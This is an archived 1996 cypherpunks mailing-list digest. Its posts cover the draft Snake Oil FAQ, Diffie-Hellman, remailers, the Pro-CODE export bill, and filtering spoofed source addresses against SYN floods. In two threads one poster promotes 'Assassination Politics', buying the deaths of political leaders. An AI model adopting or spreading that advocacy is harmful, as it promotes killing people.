>*********************************************************** >Edupage ... is what you've just finished reading. To subscribe to Edupage: >send mail to: listproc at educom.unc.edu with the message: subscribe edupage >Henry R. Luce (if your name is Henry R. Luce; otherwise, substitute your >own name). ... To cancel, send a message to: listproc at educom.unc.edu with >the message: unsubscribe edupage. (If you have subscription problems, send >mail to manager at educom.unc.edu.) From WlkngOwl at unix.asb.com Mon Sep 16 19:31:35 1996 From: WlkngOwl at unix.asb.com (Deranged Mutant) Date: Tue, 17 Sep 1996 10:31:35 +0800 Subject: Snake Oil FAQ 0.4 [comments appreciated] Message-ID: <199609161749.NAA14132@unix.asb.com> For those not-yet-in-the-know: I no longer have the time to manage it and asked for somebody (and Matt agreed to) to take the Snake Oil FAQ's care and feeding. Note that this is not cc'd to coderpunks. I don't think it's appropriate for coderpunks. On 16 Sep 96 at 9:56, C Matthew Curtin wrote: [..] > --------------------------- snake-oil-faq ---------------------------- > > Snake-Oil Warning Signs > Encryption Software to Avoid [..] > The Snake Oil FAQ is (to be) posted monthly to cypherpunks, sci.crypt, > alt.security, comp.security, and comp.infosystems. We're targeting those who Does it need to be posted monthly? Better to post pointers to it most of the time, possibly to other places as well (alt.2600 comes to mind...). Perhaps when the first 'non-beta' of this document is released a History could be added. [..] > Different products will serve different needs, and it's rare that a product > will serve every need. (Sometimes a product won't be needed: it may be Nitpick: Hm. Change that to "no product will serve every need". > better to use a utility to encrypt files, transmit them over a network using > standard file transfer tools, and decrypt them at the other end than to use > a separate encrypted utility in some cases.) 
Or more clearly: is encryption THE feature of the utility, or is it an added feature? It's better to use separate utilities made for that purpose rather than one that tries to do everything. [..] > Key Sizes > > Some ciphers, while currently secure against most attacks, are not > considered viable in the next few years because of relatively small keysizes > and increasing processor speeds (making a brute-force attacks feasible). The Change to "making brute force attacks--that is, trying every possible key--feasible". [..] > Symmetric and Public-Key Lengths With > Similar Resistance to Brute-Force Attacks > > Symmetric Key Length Public-key Key Length > 56 bits 384 bits > 64 bits 512 bits > 80 bits 768 bits > 112 bits 1792 bits > 128 bits 2304 bits That's a controversial comparison. I've read references (from a couple of years ago) saying that a 3k-bit RSA key is as strong as a 128-bit IDEA key. Trying to compare the two (symmetric and asymmetric) is like running through a tar pit. > Some Common Snake-Oil Warning Signs > > The following are some of the "red flags" one should watch for when > examining an encryption product > > * Technobabble [..] > A sign of technobabble is a description which drops a lot of technical > terms for how the system works without actually explaining how it > works. Often specifically coined terms are used to describe the scheme > which are not found in the literature. Of course, how is an amateur supposed to know if these terms are found in the literature? That was a recurring comment that people sent me when I first posted the FAQ. [..] > Just because software uses to different method of computation Typo! "uses to different method..."? [..] > grounded in mathematical theory. The security is based on problems that > are believed, if not known to be hard to solve. Hm. How about "that are widely believed"? [..] > A OTP system is not an algorithm. It works by having a "pad" of > random bits in the possession of both the sender and recipient.
[..] > never again be used. The bits in the pad must be truly random, > generated using a real random source, such as specialized > hardware, radioactive decay timings, etc., and not from an > algorithm or cipher. Anything else is not a one-time-pad. Although it is(?) mentioned below, I'd emphasize here in some way that the users of the OTP generate the key. Somebody else sending you a supposed OTP that he generated is not secure. > The vendor may confuse random session keys or initialization vectors > with OTPs. Explain random session keys and initialization vectors. A glossary at the end of the document would be a good thing. > Sometimes attacks are theoretical or impractical (requiring special > circumstances or massive computing power running for many years), and > it's easy to confuse a layman by mentioning these. Oh yeah. These need to be explained. What I had in mind was timing attacks against RSA or IDEA, or factoring of public keys. > * Keys and Passwords > > The "key" and the "password" are often not the same thing. The "key" "often" not?!? (oops...was that my wording?) They aren't the same, though often they are confused in snake oil. [..] > If there's a third-party utility that can crack the software, > avoid it. > > If the vendor claims it can recover lost passwords (without using a > key-backup or escrow feature), avoid it. > > If there is a key-backup or escrow feature, are you in control > of the backup, or does the vendor or someone else hold a copy > of the key? That is, if you lose the key, you don't want a third party to have as much a chance to recover it as you do. [..] > > If the vendor is unaware of export restrictions, avoid the software: > the vendor is not familiar with the state of the art. Also... if the vendor does not understand export restrictions, avoid the software. I'm thinking of a certain snoil-vendor who said 128-bit IDEA keys weren't secure since they could be exported.
> Because of export restrictions, some legitimate (not-Snake Oil) > products may have a freely exportable version for outside of the USA, > which is different from a separate US/Canada-only distribution. Also Such exportable versions are not as secure, of course. [..] > Other Considerations > > Interface isn't everything: user-friendliness is an important factor, but if > the product isn't secure then you're better off with something that is > secure (if not as easy to use). > > No product is secure if it's not used properly. You can be the weakest link > in the chain if you use a product carelessly. Do not trust any product to be > foolproof, and be wary of any product that claims it is. I wanted to add some sort of 'non-guru hacks' to test a product. One example might be to actually examine 'encrypted' files to see if they are really encrypted. (I'm thinking of the AMG archiver, which only encrypted the CRC; CODEC archiver also only encrypted the CRC if a file is not compressed.) Thanks again for taking over the FAQ. A good job! Rob --- No-frills sig. Befriend my mail filter by sending a message with the subject "send help" Key-ID: 5D3F2E99 1996/04/22 wlkngowl at unix.asb.com (root at magneto) Send a message with the subject "send pgp-key" for a copy of my key. From paul at fatmans.demon.co.uk Mon Sep 16 19:40:03 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Tue, 17 Sep 1996 10:40:03 +0800 Subject: Diffie Hellman - logs in Galois fields Message-ID: <842896368.27767.0@fatmans.demon.co.uk> Hi all, A question for the mathematicians out there: I am looking at the Diffie Hellman public key exchange protocol and am trying to find out why it is computationally hard to take logs in a finite (Galois) field.
My maths tutor has told me a bit about the construction of Galois fields (If I`m correct the construction is Z mod N, N some integer, then a transformation F(x) on the residue classes already in the field) I know also the definition is that there are P**k elements, p a prime. My questions are as follows: 1. How can a field be finite, as by definition it has to be closed under addition, subtraction, multiplication and division???? (sorry if this one is a bit of a no brainer, maybe the definition is different but I can`t seem to see how) 2. Why is taking logs in a finite field computationally hard? - Me and Alec (My maths tutor at college) guessed that it is because exponentiation and logs are each other's inverse functions, and somehow this becomes a one way function in a finite field. 3. Are the Galois fields used in Diffie Hellman specially constructed in any way or are they just normal GF???? Thanks for any help anyone can give me.... Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey"
From jimbell at pacifier.com Mon Sep 16 19:52:48 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 17 Sep 1996 10:52:48 +0800 Subject: The Living and the Dead Message-ID: <199609162030.NAA23935@mail.pacifier.com> At 12:40 PM 9/16/96 -0400, Brian Davis wrote: >On Sun, 15 Sep 1996, jim bell wrote: > >> .... >> How would an AP-type system treat Robert McNamara? He'd be dead in a >> second. To those who say, "What good would this do?" I respond: Anyone in > ^^^^^^ >Kind of kills the betting pool, doesn't it? > >EBD Okay, it was just an expression... It would probably take a couple weeks. Jim Bell jimbell at pacifier.com From jimbell at pacifier.com Mon Sep 16 19:55:26 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 17 Sep 1996 10:55:26 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <199609162031.NAA23962@mail.pacifier.com> At 11:24 AM 9/16/96 EDT, Dr.Dimitri Vulis KOTM wrote: >jbugden at smtplink.alis.ca writes: >> dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) wrote: >> >Starting with the lying old fart himself. >> >> You shouldn't be so hard on Tim. I tried giving up farting years ago but I = >> found >> I gained a lot of weight. It's also become more socially acceptable as evid= > >I wonder why containing one's fart would cause one to gain weight. Volume maybe, >but I'd think that gas weighs about as much as the air it displaces. Actually, less: It's mostly hydrogen. Jim Bell jimbell at pacifier.com From hallam at ai.mit.edu Mon Sep 16 20:01:56 1996 From: hallam at ai.mit.edu (hallam at ai.mit.edu) Date: Tue, 17 Sep 1996 11:01:56 +0800 Subject: Spam blacklist project Message-ID: <9609162025.AA00550@etna.ai.mit.edu> Hi, The following idea just hit me. How about a server which maintained a list of people who don't want to receive SPAM?
The idea being that email recipients who don't want SPAM send their email address to the list. A SPAMer who wants to check an email to see if it is on the list could then obtain the SHA-Digested list of addresses and remove them from their internal databases. Of course I don't for a moment imagine that this will be 100% effective. Without government regulation there will always be slimeballs who send mail to people who don't want it. The advantage of this scheme is that it would mean that the spam industry can avoid regulation pressure and they can deflect criticism. Meanwhile recipients of unwanted spam have a legitimate beef. Comments? Phill From stewarts at ix.netcom.com Mon Sep 16 20:03:18 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Tue, 17 Sep 1996 11:03:18 +0800 Subject: New Remailers? Message-ID: <199609161835.OAA01049@attrh1.attrh.att.com> At 10:53 AM 9/16/96 BST, you wrote: >I recently secured an account with anon.penet and then a few days later got >a post informing me that the service was now terminated. Anybody out there >know of any remailers where you don't have to have a Phd in computer science >and a thorough working knowledge of PGP in order to operate? Raph Levien's remailer list lives at http://www.cs.berkeley.edu/~raph/remailer-list.html Most of the remailers on it are the one-way variety - you can send mail to someone anonymously, but you don't get an address for people to reply to you. They're easy to use. Some of them also support anonymous reply blocks, which are a somewhat difficult-to-use feature - you basically PGP-encrypt your return address (in the correct syntax), and tell anybody who wants to reply to you to include the block at the beginning of their mail.
There have been some pseudonym servers besides anon.penet.fi, which provide higher security, and are easier to use than anonymous reply blocks, once you set them up (which generally involves creating anonymous reply blocks :-) Two of them have been spammed to death, but the cyber remailer at alias at alias.cyberpass.net is still up. Send it a request for help to get information. Raph has a new system coming soon; see his remailer list for details. Private Idaho is Joel McNamara's friendly user interface for remailers and PGP. http://www.eskimo.com/~joelm/pi_list.html . Runs on MSWindows. It made it _much_ easier to use the alpha nymserver while that was still alive; don't know if the new version supports cyber yet or not. Remailer security depends on encryption - otherwise wiretappers can watch mail going into the remailer and know where it's going. So you'll need to learn to use PGP, but it's pretty straightforward, and Private Idaho makes it more convenient. The Mixmaster remailers provide higher security remailing, also with no reply capability; you need to get special client software, which I think isn't ported to Windows yet? >Also, are there any remailers which will accept binary attachments? There are three popular ways to do binary attachments - 1) MIME-encoding (uses MIME headers and maybe a 7-bit content transfer encoding.) 2) UUENCODE (simple-minded header and 7-bit ASCII.) 3) Mail-handler-specific headers with binary stuff following Uuencode is a no-brainer - just stick the uuencoded binary after the remailer headers. As far as I know, none of the remailers are particularly MIME-aware, but they do glue headers together. So you could probably start sticking MIME headers after the remailer headers and try a few times to get it to work. 
Mail-handler-specific behaviour is, of course, mail-handler-specific :-) You can try it and see, and remember that the person at the other end may not have the same kind of mail handler you do, so even if you sent the mail directly instead of through a remailer, it might not work. You may have trouble getting your mail client to do what you want for sending the message (e.g. if you use Cc:Mail or MSMail.) I looked at the code for my remailer, which is a modified Ghio2, though I don't think I modified this part, and it'll trash binaries. The problem is that, after processing headers, it shoves the rest of the input stream into the output file by a loop of fgets() check for cutmarks fprintf() which will trash anything that contains nulls, and may not do the right thing for newlines either, though it won't bother high-bits. I suppose it wouldn't be too hard to write a getchar/putchar loop that checks for cutmarks while transferring data safely (this would be easier if cutmark behaviour includes outputting the cutmark.) However, the remailer uses the native mail program (e.g. sendmail) to forward the mail, so if your sendmail trashes binaries, or does annoying vestigial things like changing "From " to ">From " at the beginnings of lines, it'll still lose. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From lksmith at perseus.peganet.com Mon Sep 16 20:09:51 1996 From: lksmith at perseus.peganet.com (Luke Smith) Date: Tue, 17 Sep 1996 11:09:51 +0800 Subject: Excite Live! In-Reply-To: <01I9EA0TKKDS9ULOQC@mbcl.rutgers.edu> Message-ID: On Thu, 12 Sep 1996, E. Allen Smith wrote: > From: IN%"live at excite.com" 11-SEP-1996 22:14:03.06 > > >A request was made for the location of your Excite Live! page > > >Found your Excite Live at URL > >http://live.excite.com/?uid=CEC8C99632372D6E > > Hi. As you can see from the above, I've set up an Excite Live! 
> page up with the email address of cypherpunks at toad.com. It has top priority > on things related to cypherpunks, including technology news, political news, > international news, etcetera, plus some built-in links and searches to > appropriate places. I'd advise using the anonymizer to access the above > link (http://www.anonymizer.com:8080/http://live.excite.com/?uid=). > -Allen > well i dunno about that but HTTP://WWW.BOMBNET.COM/CHAPTER9/ is the BEST web page I have ever visited! it has live chat and even info! this site rocks! From hallam at ai.mit.edu Mon Sep 16 20:18:12 1996 From: hallam at ai.mit.edu (hallam at ai.mit.edu) Date: Tue, 17 Sep 1996 11:18:12 +0800 Subject: Kiddie porn on the Internet In-Reply-To: <199609162001.NAA21875@mail.pacifier.com> Message-ID: <9609162033.AA32637@etna.ai.mit.edu> >Yet another obligatory AP (Assassination Politics) reference: If a person >is really interested in helping out "starving children" he may be able to do >far more good by purchasing the death of the local tyrant(s), rather than >(just) buying more food. The problem is that assassination rarely leads to the installation of a government that is any better. In most cases it gets worse. In the past the US excuse for supporting bloodthirsty murderers like Pinochet, Saddam, Marcos and Noriega was that the alternative was worse. In cases like Eritrea or Ethiopia the average term of office of any given despot tends to be rather short in any case. In most cases it's a case of there being little to choose between the leaders of the various factions and that ending the war on any terms is better than allowing it to continue. Phill From jimbell at pacifier.com Mon Sep 16 20:19:15 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 17 Sep 1996 11:19:15 +0800 Subject: Kiddie porn on the Internet Message-ID: <199609162001.NAA21875@mail.pacifier.com> At 08:51 AM 9/15/96 -0700, James A.
Donald wrote: >[Allegations that "save the children" is a political organization >providing cover for an effort to ban cryptography] > >At 01:54 PM 9/9/96 -0400, Hallam-Baker wrote: >> Their main mission is sending food to Ethiopia and other famine >> areas, development work etc. It is ultra-worthy stuff. > >Not everyone who sends food to the starving children is ultra >respectable. >Problem is that the usual cause of starving children is tyranny. >In order to get close enough to the starving children to take >those cute fund raising photographs you have to pay off and get >cosy with tyrants. This creates a moral hazard, in that it is >hard to tell the difference between normal bribery needed to do >anything in a tyrannical state, and bribery to bribe tyrants to >create starving children for photo ops. >It is very common for international charities to develop excessively >friendly relationships with murderous tyrannies, Yet another obligatory AP (Assassination Politics) reference: If a person is really interested in helping out "starving children" he may be able to do far more good by purchasing the death of the local tyrant(s), rather than (just) buying more food. After all, if the donor really believes that this starvation isn't endemic to the country, he has to conclude that it's a condition which is forced on the victims. In addition, you almost always find that these starving countries have well-supplied militaries, defending the local warlords against each other as in Somalia. Indeed, in Somalia the incoming food was actually used to buoy up one group against another, because access to it is controlled directly or indirectly by the factions. Some might argue that the death of a single leader doesn't normally fix the problem. While that's often true, it's normally because there isn't an automatic guarantee that the next 20+ leaders will ALSO be killed if they display the same problems as the first. 
Provide that guarantee, and (somewhat paradoxically) not only do you not need to kill the 20+, you probably won't have to kill the first one! (wondering when the world will see the light...) Jim Bell jimbell at pacifier.com From paul at fatmans.demon.co.uk Mon Sep 16 20:25:09 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Tue, 17 Sep 1996 11:25:09 +0800 Subject: Redundancy in XOR encryption Message-ID: <842896374.27768.0@fatmans.demon.co.uk> I have a question I hope someone here might be able to answer: As the method of cryptanalysis of XOR (Ie. index of coincidence) relies on redundancy in the plaintext, would the following be strong: Compress P to get perfect compression (ie. 0 redundancy) Encrypt F (the compressed text) using a repeated key XOR of course this is all rather theoretical as there is no such thing as perfect compression, but I just thought it might be interesting to see if this is indeed strong, superficially it appears so to me...
Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From nobody at cypherpunks.ca Mon Sep 16 20:32:08 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Tue, 17 Sep 1996 11:32:08 +0800 Subject: Pro-CODE bill may not help much Message-ID: <199609161948.MAA07327@abraham.cs.berkeley.edu> After reading the text of Senator Burns's pro-CODE bill (S.1726), I'm not convinced that the bill would actually remove the barriers to the export of PGP and other strong encryption software.
I'd like to know whether you agree with my concerns, or if you think that the bill would adequately protect encryption software exports.

shabbir at vtw.org (Voters Telecommunications Watch) writes:

>DESCRIPTION OF S.1726, PRO-CODE BILL
>The Pro-CODE Act resolves to:
>
>1. Allow for the *unrestricted* export of "mass-market" or "public-domain"
>   encryption programs, including such products as Pretty Good Privacy and
>   popular World Wide Web browsers.
>
>2. Requires the Secretary of Commerce to allow the less restricted export
>   of other encryption technologies if products of similar strength are
>   generally available outside the United States, roughly up to DES
>   strength.
>
>3. Prohibits the federal government from imposing mandatory key-escrow
>   encryption policies on the domestic market and limiting the authority
>   of the Secretary of Commerce to set standards for encryption products.

I'm not sure that this interpretation of the pro-CODE bill is correct, at least as far as points (1) and (2) are concerned. It appears to me that the bill allows the government to restrict all exports of cryptographic software for general use, as long as similar restrictions are imposed on the export of software for use by foreign banks. PGP could still be prohibited. I will quote the relevant sections of the bill, with my comments.

From the text of the Pro-CODE Bill:

>SEC.3 DEFINITIONS.
>
>   (8) GENERAL LICENSE- The term "general license" means a
>       general authorization that is applicable to a type of
>       export that does not require an exporter of that type
>       export to, as a condition to exporting-
>       (A) submit a written application to the Secretary;
>           or
>       (B) receive prior written authorization by the
>           Secretary.

In other words, a "general license" means that rules may be established regulating the export of certain materials, as long as prior written application or prior written authorization for the export is not required.
For example, "Permission is hereby granted to export all encryption software with a key length not exceeding 40 bits; no written application is necessary." would be an example of a general license to export a particular type of software. >SEC. 5. PROMOTION OF COMMERCIAL ENCRYPTION PRODUCTS. > > (c) CONTROL OF EXPORTING BY SECRETARY.- > (2) ITEMS THAT DO NOT REQUIRE VALIDATED LICENSES.- > Only a general license may be required, except as > otherwise provided under the Trading With The Enemy Act > (50 U.S.C. App.1 et seq.) or the International Emergency > Economic Powers Act (50 U.S.C. 1701 et seq.) (but only to > the extent that the authority of the International > Emergency Economic Power Act is not exercised to extend > controls imposed under the Export Administration Act of > 1979), for the export or reexport of- > (A) any computer software, including computer > software with encryption capabilities, that is- > (i) generally available, as is, and designed > for installation by the user or purchaser; or > (ii) in the public domain (including on the > Internet) or publicly available because it > is generally accessible to the interested > public in any form; or > (B) any computing devise or computer hardware > solely because it incorporates or employs in > any form of computer software (including > computer software with encryption capabilities) > that is described in subparagraph (A). I interpret this to mean that export of this type of software can still be restricted by the terms of a "general license". Even though prior written permission cannot be required for export, export is permitted only if the terms of the general license are complied with. This is not the same as "unrestricted export of mass market software"; in fact, for some types of software, the "general license" rules could still forbid export entirely. 
The following section describes the conditions under which the Secretary of Commerce is required to grant a general license allowing export: > (3) COMPUTER SOFTWARE AND COMPUTER HARDWARE WITH > ENCRYPTION CAPABILITIES.- > (A) IN GENERAL.- Except as provided in subparagraph > (B), the Secretary shall authorize the export > or reexport of computer software and computer > hardware with encryption capabilities under a > general license for nonmilitary end-users in > any foreign country to which those exports of > computers software and computer hardware of > similar capability are permitted for use by > financial institutions that the Secretary > determines not to be controlled in fact by > United States persons. In other words, the Secretary must define the terms of the general license in such a way that software of "similar capability" to software that is exportable to foreign banks is also exportable for general use. Note that the requirement is that the software must be similar to software that can already be exported for use by foreign banks; it is neither necessary nor sufficient that similar products be available from foreign sources. The "similar products available from foreign competitors" rule was in the Leahy bill, but I see nothing like it in the pro-CODE bill. PGP could be held not to be of "similar capability" to the banking software, and not exportable under the terms of the general license, because it uses a different encryption algorithm, a different key length, and is capable of encrypting arbitrary data, not just financial transactions. In the future, if key escrow requirements were imposed on software exported to foreign banks, the same restriction could be imposed on software exported for general use. 
It seems to me that the idea behind section 3(A) is that if foreign bankers are willing to accept a certain level of encryption, then everyone else will accept it too, so the software industry will be able to make money exporting it; the few people who want something better (e.g. to protect their privacy against government wiretapping) don't have to be protected, because denying them protection won't cost the software companies any money. I include section 3(B) only for completeness, because it is mentioned in section 3(A): > (B) EXCEPTION.-The Secretary shall prohibit the > export or reexport of computer software and > computer hardware described in subparagraph (A) > to a foreign country if the Secretary > determines that there is substantial evidence > that such software and computer hardware will > be- > (i) diverted to a military end-use or an end- > use supporting international terrorism; > (ii) modified for military or terrorist end- > use; or > (iii) reexported without the authorization > required under Federal law. Do other people agree with this interpretation of the bill? Are most people satisfied that the bill would actually protect the right to export PGP and other strong encryption software? I haven't seen this discussed in this group before. I realize that this may be academic, because the bill is unlikely to pass now. From jbash at cisco.com Mon Sep 16 20:32:38 1996 From: jbash at cisco.com (John Bashinski) Date: Tue, 17 Sep 1996 11:32:38 +0800 Subject: J'accuse!: Whitehouse and NSA vs. Panix and VTW In-Reply-To: <2.2.32.19960916190033.010773d0@vertexgroup.com> Message-ID: <199609162039.NAA10136@mort> > Well IPSec provides for authentication of endpoints which would identify the > syn attacker. Only if the attacker were so stupid as to put in valid authentication data identifying herself. I think IPSEC would allow you to throw away the SYNs without processing them and without putting anything in your incoming connection queue. 
On the other hand, you'd have to do all the authentication protocol and computation for each packet in order to determine that it was bogus. I can see where that could lead to a still worse denial-of-service attack if your IPSEC code wasn't properly written.

> What amazes me is that routers happily pass packets with foreign IP return
> addresses.

Defining what a "foreign IP return address" is quickly becomes complicated.

> I guess there is some valid utility to being able to originate a
> connection that actually goes somewhere else for initiating a many to many
> protocol. But I can't think of any practical application that would
> necessarily be that way.

As far as I know, nothing does that.

> So why do routers let packets leave local networks that do not appear to
> originate from said local network?

Because routers don't know which networks are "local networks" and which networks are transit networks. When a router gets a packet from one of its interfaces, it has no way of knowing whether that packet originated on the local network, or was forwarded on by some other router... possibly from an original source a dozen network hops away.

> Doesn't routing work "both ways" so to speak?

Um, "both ways"? No, not really, if you mean what I think you mean. I think you're saying that, if a router receives a packet claiming to be from host A, and that packet doesn't come from the direction of host A, as defined by the direction in which the router itself would send a packet which was destined for host A, it should drop the packet.

The problem with that is that, if host A sends a packet to host B, there's no guarantee that the path that packet takes is the same as the path a packet would take from host B to host A. It usually is, but not always. Transient routing asymmetries are very common in routing protocols, and it's possible, and even occasionally useful, to set up networks where there are permanent asymmetries.
It's a pretty basic part of the architecture of IP networks that routers forward based only on destination addresses. Changing this would break a lot of existing systems. Keeping both "to" and "from" route information for each destination would entail redesigning all the routing protocols now in use, as well as doubling the associated memory and computation requirements. It won't happen soon, if ever.

It may happen that router vendors will start adding configurable options to discard suspicious packets in the (pretty common) case where routing is expected to be symmetric. Such options would have to be used with great care, by network administrators who were very sure they knew what they were doing. They couldn't be made the defaults without breaking the universe, so there'd always be people who should turn them on, but wouldn't.

As it stands today, it's possible to manually configure a router to reject packets that don't come from addresses expected on the interface the packets arrive on. Such filters are entirely static, and don't respond to changes in the network. It's reasonable to set them up on a "stub" link that forms the only path leading to a reasonably well-defined segment of the network... like a LAN, or a small site. It's much less reasonable on a router in the middle of a complex network, and more or less impossible in Internet "core" routers... unless you can anticipate every possible dynamic network change, your filters are going to get it wrong sometimes.

Myself, I always configure routers to filter out bogus source addresses... when they're being installed at points in the network where it's obvious which addresses those are. Most ISPs don't do it even when it's easy, and that's one of the sources of the problem.

-- John B.
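The two checks discussed in the message above (a static source-address filter on a stub link, and dropping packets that arrive from a direction other than the one the router would use to reach the claimed source), as an added Python example that is not part of the original message or any vendor's router code. The topologies, interface names (eth0, eth1, isp_a, isp_b) and addresses are constructed for illustration.

```python
"""Constructed model: static ingress filtering on a stub link, and why a
reverse-path check drops genuine traffic when routing is asymmetric."""
import ipaddress


class Router:
    def __init__(self, routes, ingress_filters=None):
        # routes: {prefix: outgoing interface}. Forwarding is keyed on
        # destination only, as in ordinary IP routing.
        self.routes = [(ipaddress.ip_network(p), i) for p, i in routes.items()]
        # ingress_filters: {interface: [source prefixes allowed on it]}.
        # These are static: nothing updates them when the network changes.
        self.filters = {
            iface: [ipaddress.ip_network(p) for p in prefixes]
            for iface, prefixes in (ingress_filters or {}).items()
        }

    def lookup(self, addr):
        """Longest-prefix match on a destination; returns interface or None."""
        ip = ipaddress.ip_address(addr)
        matches = [(net.prefixlen, iface) for net, iface in self.routes if ip in net]
        return max(matches)[1] if matches else None

    def static_filter_accepts(self, iface, src):
        """Manually configured filter; an unfiltered interface accepts anything."""
        allowed = self.filters.get(iface)
        if allowed is None:
            return True
        ip = ipaddress.ip_address(src)
        return any(ip in net for net in allowed)

    def reverse_path_accepts(self, iface, src):
        """Accept only if this router would send traffic *to* src out of iface."""
        return self.lookup(src) == iface


# Constructed topology 1: a stub router. One LAN sits behind eth0 and
# everything else is reached through eth1, so the valid sources on eth0
# are obvious and a static filter is safe.
STUB = Router(
    routes={"192.0.2.0/24": "eth0", "0.0.0.0/0": "eth1"},
    ingress_filters={"eth0": ["192.0.2.0/24"]},
)
STUB_PACKETS = [
    ("eth0", "192.0.2.10"),   # genuine LAN host
    ("eth0", "203.0.113.7"),  # forged source leaving the LAN
]

# Constructed topology 2: a transit router. Its best route *to*
# 198.51.100.0/24 is via isp_a, but that network's outbound traffic
# reaches this router via isp_b (a permanent routing asymmetry).
TRANSIT = Router(
    routes={
        "198.51.100.0/24": "isp_a",
        "203.0.113.0/24": "isp_b",
        "0.0.0.0/0": "isp_a",
    }
)
TRANSIT_PACKETS = [
    ("isp_b", "198.51.100.25"),  # genuine packet on the asymmetric path
]


def evaluate(router, packets):
    """Return (iface, src, static_ok, reverse_path_ok) for each packet."""
    return [
        (
            iface,
            src,
            router.static_filter_accepts(iface, src),
            router.reverse_path_accepts(iface, src),
        )
        for iface, src in packets
    ]


if __name__ == "__main__":
    for name, router, packets in (
        ("stub", STUB, STUB_PACKETS),
        ("transit", TRANSIT, TRANSIT_PACKETS),
    ):
        for iface, src, static_ok, rpf_ok in evaluate(router, packets):
            print(f"{name:8} in={iface:6} src={src:15} "
                  f"static={'pass' if static_ok else 'drop'} "
                  f"reverse-path={'pass' if rpf_ok else 'drop'}")
```

On the stub link both checks drop the forged packet and pass the genuine one; on the transit router the reverse-path check drops a genuine packet, which is the failure the message warns about.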
From jf_avon at citenet.net Mon Sep 16 20:33:22 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Tue, 17 Sep 1996 11:33:22 +0800
Subject: Flamewars and events of the outside world
Message-ID: <9609162145.AA08344@cti02.citenet.net>

Is there anybody who saw a correlation with the occurrences of flamewars or nut-cases on the list with important things that happened in the outside world that could benefit from having the CPunks looking the other way? Like this one with "Anonymous" going on. And a few others lately. Some clueless or semi-outsiders seem to drop in the group and sling mud to detract every active participant from the other topics discussed (usually, more to the point with CP). I am not ranting about the answering, I'm simply puzzled by the phenomenon. Just like, as a rule here in Canada, every time the country is really going down and that everybody starts getting fed up with the govt, suddenly the debate on death penalty or abortion or racial equality or salary inequality among sexes just pops up. Every time, it looks like it happened purely as a happenstance but every time, there was something very fishy going on at another level.

Ciao
jfa
Jean-Francois Avon, Montreal QC Canada
DePompadour, Societe d'Importation Ltee Finest Limoges porcelain and crystal
JFA Technologies, R&D consultant physicists and engineers, LabView programming
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891

From jfricker at vertexgroup.com Mon Sep 16 20:55:44 1996
From: jfricker at vertexgroup.com (John F. Fricker)
Date: Tue, 17 Sep 1996 11:55:44 +0800
Subject: J'accuse!: Whitehouse and NSA vs.
Panix and VTW Message-ID: <2.2.32.19960916190033.010773d0@vertexgroup.com> At 11:33 AM 9/13/96 -0700, stewarts at ix.netcom.com wrote: > >At least one of the newspaper articles I've read has referred to the need >for real authentication on the net to prevent the anonymity that makes >this kind of attack possible, and in particular for the major network providers >to make sure that they don't export messages with bogus addressing, >a cure that the article said would take several months to deploy. >I don't know if they were referring to IPv6, or sendmail modifications, >or router hacks, or what; the article's author seemed to think this was >about bogusly-addressed email messages rather than understanding SYNs. > Well IPSec provides for authentication of endpoints which would identify the syn attacker. What amazes me is that routers happily pass packets with foreign IP return addresses. I guess there is some valid utility to being able to originate a connection that actually goes somewhere else for intiating a many to many protocol. But I can't think of any practical application that would necessarily be that way. So why do routers let packets leave local networks that do not appear to originate from said local network? Doesn't routing work "both ways" so to speak? From shamrock at netcom.com Mon Sep 16 21:18:48 1996 From: shamrock at netcom.com (Lucky Green) Date: Tue, 17 Sep 1996 12:18:48 +0800 Subject: 56 kbps modems In-Reply-To: Message-ID: On Mon, 16 Sep 1996, Jay Gairson wrote: > Speaking of ISDN, how many people, can afford to have a personal ISDN > line in there house? And then afford to connect to something/someone > else on a next to permanent basis monthly? No problem here. My ISDN bill is a small fraction of my regular phone bill. 
--Lucky

From dlv at bwalk.dm.com Mon Sep 16 21:26:23 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 17 Sep 1996 12:26:23 +0800
Subject: Diffie Hellman - logs in Galois fields
Message-ID: <97BDuD2w165w@bwalk.dm.com>

paul at fatmans.demon.co.uk writes:

>
> Hi all,
>
> A question for the mathematicians out there:
>
> I am looking at the Diffie Hellman public key exchange protocol and
> am trying to find out why it is computationally hard to take logs in
> a finite (Galois) field.

I think polluting this mailing list with trivial questions such as this is just as bad as polluting it with personal attacks. Read the FAQs.

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From aba at dcs.ex.ac.uk Mon Sep 16 21:41:27 1996
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Tue, 17 Sep 1996 12:41:27 +0800
Subject: [Long] A history of Netscape/MSIE problems
In-Reply-To: <84279182110737@cs26.cs.auckland.ac.nz>
Message-ID: <199609142203.XAA00154@server.test.net>

Peter Guttmann writes:

> >Hadn't heard that before, that the trade secret requirement was
> >imposed on RSADSI. What was your source for that info, it is an
> >interesting assertion on the part of RSADSI, and I am intrigued.
>
> It's in AC II, p.319 (I was getting worried for a minute, I missed
> it the first time I looked and then couldn't figure out where I'd
> got the info from).

I can't see anything suggesting that the trade secret status of the algorithm had anything to do with its being granted special export status. All it says on 319 (the section on RC2) is:

: It is proprietary, and its details have not been published...

[of course since then someone did publish, anonymously]

: ...An agreement between the Software Publishers Association (SPA) and
